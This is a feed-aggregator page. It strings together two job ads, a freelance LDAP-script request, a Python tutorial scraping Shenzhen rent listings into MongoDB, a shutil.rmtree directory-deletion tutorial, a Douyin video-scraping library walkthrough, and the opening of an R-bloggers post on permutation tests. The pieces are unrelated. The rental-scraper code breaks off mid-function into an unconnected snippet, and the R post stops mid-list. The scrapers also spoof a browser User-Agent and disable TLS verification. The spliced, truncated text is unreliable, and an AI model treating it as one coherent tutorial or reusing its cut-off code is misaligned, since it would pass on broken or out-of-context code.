
          Mid SOC Analyst - XOR Security - Fairmont, WV
(e.g., Splunk dashboards, Splunk ES alerts, SNORT signatures, Python scripts, PowerShell scripts). XOR Security is currently seeking talented Cyber Threat...
From XOR Security - Sat, 14 Jul 2018 02:06:16 GMT - View all Fairmont, WV jobs
          CIO - Senior Java Developer - Experis - Lowell, MA
Hands-on experience with programming languages such as Java / Python etc. Familiarity with Microservices, AWS Web Services, Apigee and a range of open source...
From Experis - Thu, 01 Nov 2018 23:43:10 GMT - View all Lowell, MA jobs
          script to update ldap

I have an olive-oil company. The script (ideally in PowerShell or Python) should import a .ldif file into LDAP (Apache Directory Studio 2.0) and produce, as output, a log of success or error... (Budget: €250 - €750 EUR, Jobs: Linux, Powershell, Python, Shell Script, Windows Server)
          Using Python to See How High Shenzhen Rents Are

Contents: preface, statistical results, scraper technique analysis, scraper code, analysis code, afterword.

Preface

Rents in the major first- and second-tier cities have all been rising recently, but by how much overall? Nobody quite knows, so to get to the bottom of it, zone used Python to scrape Shenzhen rental listings from 房某下 (a rental listings site). Below is the sample data for this run:


[Figure: sample data]

Excluding the 【不限】 ("no limit") category (it could overlap with the others), the total sample is 16,971 listings. The districts in the latter half have fewer records simply because those districts genuinely have fewer listings. This survey is therefore far from rigorous; treat it as entertainment.

Statistical Results

Let's look at the statistics first and save the technical analysis for later.

Distribution of listings in Shenzhen (by district):

Futian and Nanshan have the most listings, but rents in those two areas are anything but cheap.


[Figure: distribution of listings by district]

Rent per unit area (average monthly price per square metre):

That is, the price of one square metre for one month. The bigger the block, the higher the price.


[Figure: rent per square metre per month]

Futian and Nanshan lead the pack at 114.874 and 113.483 yuan respectively, several times the other districts. Rent a 20-square-metre room in Futian:

114.874 x 20 = 2297.48

Add another 200 yuan for utilities and property management:

2297.48 + 200 = 2497.48

Budgeting frugally, say 10 yuan for breakfast, 25 for lunch, and 25 for dinner (60 a day):

2497.48 + 60 x 30 = 4297.48

Yes, merely staying alive costs 4297.48 yuan a month.

Eat out occasionally, buy some clothes each month, add transport, date a girlfriend and go shopping with her, and you can comfortably add another 3,500:

4297.48 + 3500 = 7797.48. Send Mom and Dad a thousand each: 7797.48 + 2000 = 9797.48.

Even a solid salary of 10,000 a month leaves you living paycheck to paycheck.

Rent per unit area (average daily price per square metre):

That is, the price of one square metre for one day.

[Figure: rent per square metre per day]

If the countryside never gave you the sense that every inch of land is worth gold, go try Beijing, Shanghai, Guangzhou, or Shenzhen: in Futian, one square metre costs 3.829 yuan per day. [facepalm]

Floor Plans

The dominant floor plans are 3-bedroom/2-living-room and 2-bedroom/2-living-room. Teaming up with friends to rent is the best option; sharing with strangers can bring a string of unpleasant surprises. The bigger the font, the more listings with that floor plan.


[Figure: floor plans]

Rental Area Statistics

Units of 30-90 square metres make up the majority; for now, the best plan is for a few friends to rent together and huddle for warmth.


[Figure: rental area statistics]

Listing-Description Word Cloud

This word cloud is built from the scraped listing descriptions; the bigger the font, the more often the word appears. 【精装修】 ("fully renovated") dominates, which suggests long-term rental apartments have also taken a large share of the market.


[Figure: listing-description word cloud]

Scraper Approach

First scrape the listings for each Shenzhen district from 房某下, store them in MongoDB, and then run the analysis.


[Figure: district list]

A sample document from the database:

    /* 1 */
    {
        "_id" : ObjectId("5b827d5e8a4c184e63fb1325"),
        "traffic" : "距沙井电子城公交站约567米。",  // transit description
        "address" : "宝安-沙井-名豪丽城",  // address
        "price" : 3100,  // price
        "area" : 110,  // area
        "direction" : "朝南\r\n",  // orientation
        "title" : "沙井名豪丽城精装三房家私齐拎包住高层朝南随时看房",  // title
        "rooms" : "3室2厅",  // floor plan
        "region" : "宝安"  // district
    }

Scraper stack:

- HTTP requests: requests
- HTML parsing: BeautifulSoup
- Word cloud: wordcloud
- Data visualization: pyecharts
- Database: MongoDB
- Database driver: pymongo

Scraper Code

First, right-click the page and view the source to find the parts we want to scrape.

[Figure: page source]

Implementation: for reasons of length only the main code is shown. Fetching one page of data:

def getOnePageData(self, pageUrl, reginon="不限"):
    rent = self.getCollection(self.region)
    self.session.headers.update({
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36'})
    res = self.session.get(pageUrl)
    soup = BeautifulSoup(res.text, "html.parser")
    divs = soup.find_all("dd", attrs={"class": "info rel"})  # the divs we want to scrape
    for div in divs:
        ps = div.find_all("p")
        try:  # some listings are incomplete, or an ad was inserted, so a tag may be missing and raise
            for index, p in enumerate(ps):  # from the source we can see every p tag holds wanted info, so iterate over them
                text = p.text.strip()
                print(text)  # print to check that this is the information we want
            print("===================================")
            # scrape and store into MongoDB
            roomMsg = ps[1].text.split("|")
            # handled this way because some listings are incomplete and the field would otherwise be empty
            area = roomMsg[2].strip()[:len(roomMsg[2]) - 2]
            rentMsg = self.getRentMsg(
                ps[0].text.strip(),
                roomMsg[1].strip(),
                int(float(area)),
                int(ps[len(ps) - 1].text.strip()[:len(ps[len(ps) - 1].text.strip()) - 3]),
                ps[2].text.strip(),
                ps[3].text.strip(),
                ps[2].text.strip()[:2],
                roomMsg[3],
            )
            rent.insert(rentMsg)
        except:
            continue

Data Analysis Implementation

Data analysis:

# rent per square metre per month for one district (yuan)
def getAvgPrice(self, region):
    areaPinYin = self.getPinyin(region=region)
    collection = self.zfdb[areaPinYin]
    totalPrice = collection.aggregate([{'$group': {'_id': '$region', 'total_price': {'$sum': '$price'}}}])
    totalArea = collection.aggregate([{'$group': {'_id': '$region', 'total_area': {'$sum': '$area'}}}])
    totalPrice2 = list(totalPrice)[0]["total_price"]
    totalArea2 = list(totalArea)[0]["total_area"]
    return totalPrice2 / totalArea2

# monthly cost of one square metre in each district
def getTotalAvgPrice(self):
    totalAvgPriceList = []
    totalAvgPriceDirList = []
    for index, region in enumerate(self.getAreaList()):
        avgPrice = self.getAvgPrice(region)
        totalAvgPriceList.append(round(avgPrice, 3))
        totalAvgPriceDirList.append({"value": round(avgPrice, 3), "name": region + " " + str(round(avgPrice, 3))})
    return totalAvgPriceDirList

# daily cost of one square metre in each district
def getTotalAvgPricePerDay(self):
    totalAvgPriceList = []
    for index, region in enumerate(self.getAreaList()):
        avgPrice = self.getAvgPrice(region)
        totalAvgPriceList.append(round(avgPrice / 30, 3))
    return (self.getAreaList(), totalAvgPriceList)

# sample count for each district
def getAnalycisNum(self):
    analycisList = []
    for index, region in enumerate(self.getAreaList()):
        collection = self.zfdb[self.pinyinDir[region]]
        print(region)
        totalNum = collection.aggregate([{'$group': {'_id': '', 'total_num': {'$sum': 1}}}])
        totalNum2 = list(totalNum)[0]["total_num"]
        analycisList.append(totalNum2)
    return (self.getAreaList(), analycisList)

# share of listings in each district
def getAreaWeight(self):
    result = self.zfdb.rent.aggregate([{'$group': {'_id': '$region', 'weight': {'$sum': 1}}}])
    areaName = []
    areaWeight = []
    for item in result:
        if item["_id"] in self.getAreaList():
            areaWeight.append(item["weight"])
            areaName.append(item["_id"])
            print(item["_id"])
            print(item["weight"])
            # print(type(item))
    return (areaName, areaWeight)

# fetch title data, used to build the word cloud
def getTitle(self):
    collection = self.zfdb["rent"]
    queryArgs = {}
    projectionFields = {'_id': False, 'title': True}  # select the needed fields with a dict
    searchRes = collection.find(queryArgs, projection=projectionFields).limit(1000)
    content = ''
    for result in searchRes:
        print(result["title"])
        content += result["title"]
    return content

# fetch floor-plan data (e.g. 3室2厅)
def getRooms(self):
    results = self.zfdb.rent.aggregate([{'$group': {'_id': '$rooms', 'weight': {'$sum': 1}}}])
    roomList = []
    weightList = []
    for result in results:
        roomList.append(result["_id"])
        weightList.append(result["weight"])
    return (roomList, weightList)

# fetch rental-area counts
def getAcreage(self):
    results0_30 = self.zfdb.rent.aggregate([
        {'$match': {'area': {'$gt': 0, '$lte': 30}}},
        {'$group': {'_id': '', 'count': {'$sum': 1}}}
    ])
    results30_60 = self.zfdb.rent.aggregate([
        {'$match': {'area': {'$gt': 30, '$lte': 60}}},
        {'$group': {'_id': '', 'count': {'$sum': 1}}}
    ])
    results60_90 = self.zfdb.rent.aggregate([
        {'$match': {'area': {'$gt': 60, '$lte': 90}}},
        {'$group': {'_id': '', 'count': {'$sum': 1}}}
    ])
    results90_120 = self.zfdb.rent.aggregate([
        {'$match': {'area': {'$gt': 90, '$lte': 120}}},
        {'$group': {'_id': '', 'count': {'$sum': 1}}}
    ])
    results120_200 = self.zfdb.rent.aggregate([
        {'$match': {'area': {'$gt': 120, '$lte': 200}}},
        {'$group': {'_id': '', 'count': {'$sum': 1}}}
    ])
    results200_300 = self.zfdb.rent.aggregate([
        {'$match': {'area': {'$gt': 200, '$lte': 300}}},
        {'$group': {'_id': '', 'count': {'$sum': 1}}}
    ])
    results300_400 = self.zfdb.rent.aggregate([
        {'$match': {'area': {'$gt': 300, '$lte': 400}}},
        {'$group': {'_id': '', 'count': {'$sum': 1}}}
    ])
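getAcreage() above issues a stack of near-identical range queries. Once the area values are in memory, the same (lo, hi] bucketing takes only a few lines of plain Python; a sketch with made-up areas, independent of MongoDB:

```python
import bisect
from collections import Counter

# Bucket boundaries matching the queries above: (0, 30], (30, 60], ..., (300, 400]
bounds = [0, 30, 60, 90, 120, 200, 300, 400]
labels = ['%d-%d' % (lo, hi) for lo, hi in zip(bounds, bounds[1:])]

def bucket(area):
    """Return the label of the half-open bucket (lo, hi] containing area."""
    i = bisect.bisect_left(bounds, area)  # (lo, hi] semantics match $gt/$lte
    return labels[i - 1] if 0 < i <= len(labels) else None

areas = [25, 45, 45, 70, 95, 150, 350]  # made-up sample areas
counts = Counter(bucket(a) for a in areas)
print(counts['30-60'])  # → 2
```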
          Python : How to delete a directory recursively using shutil.rmtree()

In this article we will discuss how to delete an empty directory, and how to delete all the contents of a directory recursively, i.e. including the contents of its sub-directories.

Delete an empty directory using os.rmdir()

Python's os module provides a function to delete an empty directory:

os.rmdir(pathOfDir)

The path of the directory can be relative or absolute. It will delete the empty folder at the given path.

It can raise errors in the following scenarios:

- OSError: [WinError 145] The directory is not empty: raised if the directory is not empty.
- NotADirectoryError: [WinError 267] The directory name is invalid: raised if the given path does not point to a directory.
- FileNotFoundError: [WinError 2] The system cannot find the file specified: raised if there is no directory at the given path.
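A quick, self-contained way to see these errors (using a temporary directory so nothing real is touched):

```python
import os
import tempfile

# Create a scratch area so the demonstration is side-effect free.
base = tempfile.mkdtemp()

# Case 1: deleting a non-empty directory raises OSError.
full = os.path.join(base, 'full')
os.mkdir(full)
open(os.path.join(full, 'file.txt'), 'w').close()
try:
    os.rmdir(full)
except OSError as e:
    print('OSError raised:', e.strerror)

# Case 2: deleting a path that does not exist raises FileNotFoundError.
try:
    os.rmdir(os.path.join(base, 'missing'))
except FileNotFoundError:
    print('FileNotFoundError raised')

# Case 3: an empty directory is removed without error.
empty = os.path.join(base, 'empty')
os.mkdir(empty)
os.rmdir(empty)
print('empty directory removed:', not os.path.exists(empty))
```

(The exact [WinError …] messages above are Windows-specific; on Linux and macOS the exception types are the same but the messages differ.)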

Let’s use this to delete an empty directory,

import os

# Delete an empty directory using os.rmdir() and handle exceptions
try:
    os.rmdir('/somedir/log9')
except:
    print('Error while deleting directory')

Delete all files in a directory & sub-directories recursively using shutil.rmtree()

Python's shutil module provides a function to delete all the contents of a directory:

shutil.rmtree(path, ignore_errors=False, onerror=None)

It accepts three arguments: path, ignore_errors, and onerror.

The path argument should be the path of the directory to be deleted. We will discuss the other arguments very soon.

Module required,

import shutil

Let's use this to delete all the contents of a directory:

import shutil

dirPath = '/somedir/logs/'

# Delete all contents of a directory using shutil.rmtree() and handle exceptions
try:
    shutil.rmtree(dirPath)
except:
    print('Error while deleting directory')

It will delete all the contents of the directory '/somedir/logs/'.

But if any file in the directory is read-only, i.e. the user cannot delete that file, it will raise an exception:

PermissionError: [WinError 5] Access is denied:

Moreover, the remaining files will not be deleted. To handle this kind of scenario, let's use another argument: ignore_errors.

shutil.rmtree() & ignore_errors

By passing ignore_errors=True to shutil.rmtree() we can ignore the errors encountered. It will go forward with deleting all the files it can and skip the files which raise exceptions while being deleted.

Suppose we have a file in the logs directory that cannot be deleted due to permission issues. Then,

shutil.rmtree(dirPath, ignore_errors=True)

will remove all the other files from the '/somedir/logs' directory except the file with permission issues, and it will not raise any error.
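The effect is easy to demonstrate even without a permission-locked file: calling shutil.rmtree() on a path that does not exist normally raises, but with ignore_errors=True it returns silently. A minimal sketch:

```python
import os
import shutil
import tempfile

# A directory path that is guaranteed not to exist.
missing = os.path.join(tempfile.mkdtemp(), 'no-such-subdir')

# Without ignore_errors, a missing path raises.
try:
    shutil.rmtree(missing)
except FileNotFoundError:
    print('raised FileNotFoundError')

# With ignore_errors=True, the same call is a silent no-op.
shutil.rmtree(missing, ignore_errors=True)
print('no exception with ignore_errors=True')
```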

But we might not always want to ignore errors; instead we may want to handle them. For that, shutil.rmtree() has another argument: onerror.

Passing callbacks in shutil.rmtree() with onerror

shutil.rmtree(path, ignore_errors=False, onerror=None)

Through the onerror parameter we can pass a callback function to handle errors:

shutil.rmtree(dirPath, onerror=handleError )

The callback passed to onerror must be a callable like this:

def handleError(func, path, exc_info):
    pass

It should accept three parameters:

- func: the function which raised the exception
- path: the path name passed to func which raised the exception during removal
- exc_info: the exception information returned by sys.exc_info()

If an exception occurs while rmtree() is deleting a file and an onerror callback is provided, the callback is called to handle the error; afterwards shutil.rmtree() continues deleting the other files.

Now suppose we want to delete all the contents of the directory '/somedir/logs', but one file in it cannot be deleted due to permission issues. Let's pass a callback to handle the error:

import os
import shutil
import stat

'''
Error handler function:
it will try to change the file permission and call the calling function again.
'''
def handleError(func, path, exc_info):
    print('Handling error for file ', path)
    print(exc_info)
    # Check if it is a file access issue
    if not os.access(path, os.W_OK):
        # Try to change the permission of the file
        os.chmod(path, stat.S_IWUSR)
        # Call the calling function again
        func(path)

# Delete all contents of a directory and handle errors
shutil.rmtree(dirPath, onerror=handleError)

Now, while deleting the files in the given directory, as soon as rmtree() encounters a file that cannot be deleted, it calls the callback passed in the onerror parameter for that file.

In this callback we check whether it is an access issue; if so, we change the file's permission and then call the function that raised the error, func (rmtree's internal remove function), with the path of the file. That will eventually delete the file, and rmtree() will continue deleting the other files in the directory.

The complete example is as follows:

import os
import shutil
import stat

'''
Error handler function:
it will try to change the file permission and call the calling function again.
'''
def handleError(func, path, exc_info):
    print('Handling error for file ', path)
    print(exc_info)
    # Check if it is a file access issue
    if not os.access(path, os.W_OK):
        # Try to change the permission of the file
        os.chmod(path, stat.S_IWUSR)
        # Call the calling function again
        func(path)

def main():
    print("******** Delete an empty directory *********")
    # Delete an empty directory using os.rmdir() and handle exceptions
    try:
        os.rmdir('/somedir/log9')
    except:
        print('Error while deleting directory')

    print("******** Delete all contents of a directory *********")
    dirPath = '/somedir/logs/'
    # Delete all contents of a directory using shutil.rmtree() and handle exceptions
    try:
        shutil.rmtree(dirPath)
    except:
        print('Error while deleting directory')

    # Delete all contents of a directory and ignore errors
    shutil.rmtree(dirPath, ignore_errors=True)

    # Delete all contents of a directory and handle errors
    shutil.rmtree(dirPath, onerror=handleError)

if __name__ == '__main__':
    main()


          Scrape Douyin in Ten Lines of Python

Today I came across an article on using Python to scrape Douyin's short videos and music. My interest piqued, let's see if it works.

First, a look at the result...

[Figure: result]
Environment

python 3.7.1

centos 7.4

pip 10.0.1

Deployment:

    [root@localhost ~]# python3.7 --version
    Python 3.7.1
    [root@localhost ~]#
    [root@localhost ~]# pip3 install douyin

The install occasionally fails for network reasons; if so, just rerun the command above until it completes.

Importing the douyin module

    [root@localhost ~]# python3.7
    >>> import douyin
    >>>

If the import raises an error, the douyin module probably did not install successfully.

Now let's start scraping Douyin's short videos and music.

[root@localhost douyin]# python3.7 dou.py
[Figure: script output]

A few minutes later... let's look at what we scraped.

You can see that each video's accompanying music is stored as an mp3 file and the Douyin videos themselves as mp4 files.

[Figure: downloaded files]

Hmm... not bad at all.

The script

According to the author, the goal is to scrape every video under Douyin's trending topics and trending music, download those videos, separately download the music each video is set to, and on top of that capture each video's metadata (publisher, like count, comment count, publish time, location, and so on) and store it all in MongoDB.

import douyin
from douyin.structures import Topic, Music

# Define the handlers for video download, music download, and MongoDB storage
video_file_handler = douyin.handlers.VideoFileHandler(folder='./videos')
music_file_handler = douyin.handlers.MusicFileHandler(folder='./musics')
# mongo_handler = douyin.handlers.MongoHandler()

# Define the downloader, passing the handlers as arguments
# downloader = douyin.downloaders.VideoDownloader([mongo_handler, video_file_handler, music_file_handler])
downloader = douyin.downloaders.VideoDownloader([video_file_handler, music_file_handler])

# Loop over Douyin's trending feed, downloading and storing as we go
for result in douyin.hot.trend():
    for item in result.data:
        # Scrape all videos under each trending topic and music entry,
        # at most 10 videos per topic or music entry
        downloader.download(item.videos(max=10))

Since I don't have MongoDB here, I commented out the MongoDB-related lines.

The author's GitHub: https://github.com/Python3WebSpider/DouYin

==== The following is quoted from the author ====

Code walkthrough

This library depends on:

- aiohttp: asynchronous downloads, for speed
- dateparser: parsing dates in arbitrary formats
- motor: asynchronous MongoDB storage, for speed
- requests: basic HTTP request simulation
- tqdm: progress-bar display

Data structure definitions

When building a library, one important step is to give the key entities structured definitions, encapsulating them with object-oriented thinking; scraping Douyin is no exception.

Douyin actually has many kinds of objects: videos, music, topics, users, comments, and so on, linked to one another by relationships. A video uses a piece of music, so video and music stand in a "uses" relationship; a user publishes a video, so user and video stand in a "published" relationship. We can encapsulate each of these objects with object-oriented thinking; a video, for example, can be defined like this:

class Video(Base):
    def __init__(self, **kwargs):
        """
        init video object
        :param kwargs:
        """
        super().__init__()
        self.id = kwargs.get('id')
        self.desc = kwargs.get('desc')
        self.author = kwargs.get('author')
        self.music = kwargs.get('music')
        self.like_count = kwargs.get('like_count')
        self.comment_count = kwargs.get('comment_count')
        self.share_count = kwargs.get('share_count')
        self.hot_count = kwargs.get('hot_count')
        ...
        self.address = kwargs.get('address')

    def __repr__(self):
        """
        video to str
        :return: str
        """
        return '<Video: <%s, %s>>' % (self.id, self.desc[:10].strip() if self.desc else None)

Some key attributes are defined as part of the Video class: the id index, the desc description, the author publisher, the music soundtrack, and so on. author and music are not simple strings; they are separately defined data structures. author, for example, is a User object, and User in turn is defined as:

class User(Base):
    def __init__(self, **kwargs):
        """
        init user object
        :param kwargs:
        """
        super().__init__()
        self.id = kwargs.get('id')
        self.gender = kwargs.get('gender')
        self.name = kwargs.get('name')
        self.create_time = kwargs.get('create_time')
        self.birthday = kwargs.get('birthday')
        ...

    def __repr__(self):
        """
        user to str
        :return:
        """
        return '<User: <%s, %s>>' % (self.alias, self.name)

So, by linking objects through their attributes we tie the different entities together. This keeps the logical structure clear, and it saves us from maintaining one-off dictionaries for storage; it's much like the Item definitions in Scrapy.

Requests and retries

The scraping process itself needs little explanation: it's the simplest packet-capture technique, using Charles to capture traffic directly. Once captured, the API requests can be observed and then simulated.

So the question becomes: do I have to write one request method per endpoint? And configure headers, timeouts, and so on for each? That would be far too laborious, so we encapsulate the request logic into a single method; here I defined a fetch method:

def _fetch(url, **kwargs):
    """
    fetch api response
    :param url: fetch url
    :param kwargs: other requests params
    :return: json of response
    """
    response = requests.get(url, **kwargs)
    if response.status_code != 200:
        raise requests.ConnectionError('Expected status code 200, but got {}'.format(response.status_code))
    return response.json()

This method has one required parameter, url; everything else I left as kwargs, which can be passed arbitrarily and are handed straight through to the requests call. It also does error handling: a successful request returns the parsed result, and a non-200 status raises.

With this defined, other methods just call fetch without worrying about exception handling or return types.

Good, so the request is defined; but what if a request fails? The conventional approach would be to wrap fetch in another method, count the failed calls, and re-invoke fetch to retry, but there is a better library for this called retrying, which lets us implement retries by defining a decorator.

For example, I can decorate the fetch method with the retry decorator like this:

from retrying import retry

@retry(stop_max_attempt_number=retry_max_number, wait_random_min=retry_min_random_wait,
       wait_random_max=retry_max_random_wait, retry_on_exception=need_retry)
def _fetch(url, **kwargs):
    pass

Four decorator parameters are used here:

- stop_max_attempt_number: the maximum number of attempts; give up retrying once it is reached
- wait_random_min: the minimum random wait before the next retry
- wait_random_max: the maximum random wait before the next retry
- retry_on_exception: a predicate that decides which exceptions warrant a retry

The retry_on_exception parameter names a method, need_retry, defined as follows:

def need_retry(exception):
    """
    need to retry
    :param exception:
    :return:
    """
    result = isinstance(exception, (requests.ConnectionError, requests.ReadTimeout))
    if result:
        print('Exception', type(exception), 'occurred, retrying...')
    return result

It checks whether the exception is a requests ConnectionError or ReadTimeout; if so, it retries, and otherwise it does not.
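If you'd rather avoid an extra dependency, the same idea fits in a few lines of plain Python. This is a hedged sketch of a retrying-style decorator, not the retrying library itself (like retrying, the waits here are in milliseconds):

```python
import functools
import random
import time

def retry(stop_max_attempt_number=3, wait_random_min=0, wait_random_max=100,
          retry_on_exception=lambda exc: True):
    """Minimal stand-in for the retrying library's decorator (waits in ms)."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            for attempt in range(1, stop_max_attempt_number + 1):
                try:
                    return func(*args, **kwargs)
                except Exception as exc:
                    # Give up if the predicate rejects the exception
                    # or this was the final attempt.
                    if not retry_on_exception(exc) or attempt == stop_max_attempt_number:
                        raise
                    time.sleep(random.uniform(wait_random_min, wait_random_max) / 1000.0)
        return wrapper
    return decorator

# Demo: a flaky function that fails twice, then succeeds.
calls = {'n': 0}

@retry(stop_max_attempt_number=5,
       retry_on_exception=lambda exc: isinstance(exc, ConnectionError))
def flaky():
    calls['n'] += 1
    if calls['n'] < 3:
        raise ConnectionError('transient failure')
    return 'ok'

result = flaky()
print(result, calls['n'])  # → ok 3
```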

So we've encapsulated the request with automatic retries. Pretty Pythonic, no?

Designing the download handler

To download the videos we need a download handler. Its input is batch after batch of scraped video links; on receiving them it downloads them, stores the videos in the right place, and can also perform some metadata-storage operations.

The download handler has two design requirements: fast downloads and strong extensibility. Let's look at each:

- Fast downloads: either multithreading/multiprocessing or asynchronous I/O, and the latter clearly has the edge.
- Strong extensibility: the handler must download both audio and video and also support database storage, so to keep things decoupled we split video download, music download, and database storage into independent components; the download handler only handles the main routing and dispatch of video links.

To achieve fast downloads we can use aiohttp. We also shouldn't download everything at once, or the network fluctuates too much, so we download batch-style, which avoids floods of simultaneous requests and network congestion. The main download function is:

def download(self, inputs):
    """
    download video or video lists
    :param data:
    :return:
    """
    if isinstance(inputs, types.GeneratorType):
        temps = []
        for result in inputs:
            print('Processing', result, '...')
            temps.append(result)
            if len(temps) == self.batch:
                self.process_items(temps)
                temps = []
    else:
        inputs = inputs if isinstance(inputs, list) else [inputs]
        self.process_items(inputs)

This download method accepts several input types: a generator, or a single video object or a list of them. It then calls process_items to perform the asynchronous download, which is implemented as follows:

def process_items(self, objs):
    """
    process items
    :param objs: objs
    :return:
    """
    # define progress bar
    with tqdm(total=len(objs)) as self.bar:
        # init event loop
        loop = asyncio.get_event_loop()
        # get num of batches
        total_step = int(math.ceil(len(objs) / self.batch))
        # for every batch
        for step in range(total_step):
            start, end = step * self.batch, (step + 1) * self.batch
            print('Processing %d-%d of files' % (start + 1, end))
            # get batch of objs
            objs_batch = objs[start: end]
            # define tasks and run loop
            tasks = [asyncio.ensure_future(self.process_item(obj)) for obj in objs_batch]
            for task in tasks:
                task.add_done_callback(self.update_progress)
            loop.run_until_complete(asyncio.wait(tasks))

Here asyncio provides the asynchronous processing; batching the video links keeps the traffic stable, and tqdm renders the progress bar.
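The batching idea itself is independent of the download logic; stripped down, it is just this (a sketch with made-up data, not code from the douyin library):

```python
import math

def process_in_batches(objs, batch, process):
    """Split objs into fixed-size batches and hand each batch to process()."""
    total_step = int(math.ceil(len(objs) / batch))
    for step in range(total_step):
        start, end = step * batch, (step + 1) * batch
        process(objs[start:end])   # slicing past the end is safe in Python

seen = []
process_in_batches(list(range(7)), batch=3, process=seen.append)
print(seen)  # → [[0, 1, 2], [3, 4, 5], [6]]
```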

As you can see, the method that really handles a download is process_item, which calls on the video-download, music-download, and database-storage components. Since we use asyncio for asynchronous processing, process_item must itself support asynchronous execution; it is defined as:

async def process_item(self, obj):
    """
    process item
    :param obj: single obj
    :return:
    """
    if isinstance(obj, Video):
        print('Processing', obj, '...')
        for handler in self.handlers:
            if isinstance(handler, Handler):
                await handler.process(obj)

Here you can see that the real processing logic lives in the individual handlers. Each separate function is extracted into its own Handler, which gives good decoupling: to add or disable a feature we just configure different Handlers rather than change code. This is a decoupling idea from design patterns, similar to the factory pattern.

Handler design

As just described, a Handler is responsible for one concrete function, such as video download, music download, or data storage, so we define them as separate Handlers. Video download and music download are both file downloads, so we can use inheritance and design a file-download Handler, defined as:

from os.path import join, exists
from os import makedirs
from douyin.handlers import Handler
from douyin.utils.type import mime_to_ext
import aiohttp


class FileHandler(Handler):
    def __init__(self, folder):
        """
        init save folder
        :param folder:
        """
        super().__init__()
        self.folder = folder
        if not exists(self.folder):
            makedirs(self.folder)

    async def _process(self, obj, **kwargs):
        """
        download to file
        :param url: resource url
        :param name: save name
        :param kwargs:
        :return:
        """
        print('Downloading', obj, '...')
        kwargs.update({'ssl': False})
        kwargs.update({'timeout': 10})
        async with aiohttp.ClientSession() as session:
            async with session.get(obj.play_url, **kwargs) as response:
                if response.status == 200:
                    extension = mime_to_ext(response.headers.get('Content-Type'))
                    full_path = join(self.folder, '%s.%s' % (obj.id, extension))
                    with open(full_path, 'wb') as f:
                        f.write(await response.content.read())
                    print('Downloaded file to', full_path)
                else:
                    print('Cannot download %s, response status %s' % (obj.id, response.status))

    async def process(self, obj, **kwargs):
        """
        process obj
        :param obj:
        :param kwargs:
        :return:
        """
        return await self._process(obj, **kwargs)

Here we again use aiohttp, because the download handler requires Handlers to support asynchronous operation. The download simply requests the file's URL, determines the file type, and saves the file.

The video-download Handler then only needs to inherit from this FileHandler:

from douyin.handlers import FileHandler
from douyin.structures import Video


class VideoFileHandler(FileHandler):
    async def process(self, obj, **kwargs):
        """
        process video obj
        :param obj:
        :param kwargs:
        :return:
        """
        if isinstance(obj, Video):
            return await self._process(obj, **kwargs)

It really just adds a type check to ensure data consistency, and the music download works the same way.

Asynchronous MongoDB storage

The Handlers for video and music are covered above, which leaves one storage Handler: MongoDB. We would usually use PyMongo for storage, but here, for speed, we need asynchronous operation, and there is a library for asynchronous MongoDB storage called Motor. Its usage is largely the same; the connection object is no longer PyMongo's MongoClient but Motor's AsyncIOMotorClient, and the rest of the configuration is basically similar.

For storage, update_one is used with the upsert parameter enabled: a document is updated if it exists and inserted if it does not, which guarantees the data stays free of duplicates.
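The upsert semantics can be illustrated without a running MongoDB by a tiny in-memory stand-in (purely for intuition; real code would call collection.update_one on a Motor or PyMongo collection):

```python
def update_one(collection, filt, update, upsert=False):
    """Toy in-memory version of MongoDB's update_one with a $set document."""
    for doc in collection:
        if all(doc.get(k) == v for k, v in filt.items()):
            doc.update(update['$set'])   # document exists: update it in place
            return 'updated'
    if upsert:
        new_doc = dict(filt)             # document missing: insert filter + fields
        new_doc.update(update['$set'])
        collection.append(new_doc)
        return 'inserted'
    return 'no-op'

videos = []
first = update_one(videos, {'id': 1}, {'$set': {'desc': 'first'}}, upsert=True)
second = update_one(videos, {'id': 1}, {'$set': {'desc': 'second'}}, upsert=True)
print(first, second, videos)  # → inserted updated [{'id': 1, 'desc': 'second'}]
```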

The complete MongoDB storage Handler is defined as follows:

from douyin.handlers import Handler
from motor.motor_asyncio import AsyncIOMotorClient
from douyin.structures import *


class MongoHandler(Handler):
    def __init__(self, conn_uri=None, db='douyin'):
        """
        init save folder
        :param folder:
        """
        super().__init__()
        if not conn_uri:
            conn_uri = 'localhost'
        self.client = AsyncIOMotorClient(conn_uri)
        self.db = self.client[db]

    async def process(self, obj, **kwargs):
        """
        download to file
        :param url: resource url
        :param name: save name
        :param kwargs:
        :return:
        """
        collection_name = 'default'
        if isinstance(obj, Video):
            collection_name = 'videos'
        elif isinstance(obj, Music):
            collection_name = 'musics'
        collection = self.db[collection_name]
        # save to mongodb
        print('Saving', obj, 'to mongodb...')
        if await collection.update_one({'id': obj.id}, {'$set': obj.json()}, upsert=True):
            print('Saved', obj, 'to mongodb successfully')
        else:
            print('Error occurred while saving', obj)

As you can see, the class defines an AsyncIOMotorClient object and exposes the conn_uri connection string and the db database name, so the MongoDB address and database can be specified when instantiating MongoHandler.

The process method is the same as before, except that the update_one call is awaited, which completes the asynchronous MongoDB write.

Good. That covers all the key parts of the douyin library. This should help you understand the core of its implementation, and perhaps also offer something on design patterns, object-oriented thinking, and a few practical libraries.

参考: https://github.com/Python3WebSpider/DouYin

Scrape Douyin in under 10 lines of code

Attachments:

douyin.py

Python-3.7.1.tar.xz
          Beyond Univariate, Single-Sample Data with MCHT

(This article was first published on R Curtis Miller's Personal Website , and kindly contributed toR-bloggers)

Introduction

I’ve spent the past few weeks writing about MCHT , my new package for Monte Carlo and bootstrap hypothesis testing. After discussing how to use MCHT safely , I discussed how to use it for maximized Monte Carlo (MMC) testing , then bootstrap testing . One may think I’ve said all I want to say about the package, but in truth, I’ve only barely passed the halfway point!

Today I'm demonstrating how general MCHT is, allowing one to use it for multiple samples and on non-univariate data. I'll be doing so with two examples: a permutation test and the F test for significance of a regression model.

Permutation Test

The idea of the permutation test dates back to Fisher (see [1]), and it forms the basis of computational testing for difference in mean. Let's suppose that we have two samples with respective means mu_X and mu_Y. Suppose we wish to test

H0: mu_X = mu_Y

against

HA: mu_X > mu_Y
using samples x_1, ..., x_m and y_1, ..., y_n, respectively.

If the null hypothesis is true, and we also make the stronger assumption that the two samples were drawn from distributions that could differ only in their means, then the labelling of the two samples is artificial; if it were removed, the two samples would be indistinguishable. Relabelling the data, artificially calling one sample the x sample and the other the y sample, would produce statistics highly similar to the one we actually observed. This observation suggests the following procedure:

1. Generate N new datasets by randomly reassigning labels to the combined sample of x_1, ..., x_m and y_1, ..., y_n.
